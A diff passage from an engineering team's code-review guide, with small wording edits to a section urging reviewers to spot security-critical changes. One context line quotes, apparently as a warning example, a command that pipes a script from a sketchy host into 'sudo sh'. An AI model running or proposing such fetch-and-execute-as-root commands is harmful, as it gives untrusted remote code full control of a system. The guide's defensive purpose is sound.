Zemanta/engineering-at-zemanta/4-Code-Reviews.md

 curl "http://sketchy-site.com/im-completely-legit.sh" | sudo sh
 ```

-By no means we'll be covering all possible vectors that would weaken the security of your systems, just use all your knowledge about possible attack vectors of the code your writing or reviewing and try to prevent the introduction of potentially harmful code.
+By no means we'll be covering all possible vectors that would weaken the security of our systems, just use all of your knowledge about possible attack vectors of the code your writing or reviewing and try to prevent the introduction of potentially harmful code.

-When submitting a code review that introduces or changes security critical code try to think who on your team has the most knowledge about a particular module or technology and would be able to detect harmful changes.
+When submitting a code review that introduces or changes security critical code try to think, who on your team has the most knowledge about a particular module or technology and would be able to detect harmful changes.
 Make sure they also review your code.

 ## 4. Adhering to Good and Established Code Practices and Patterns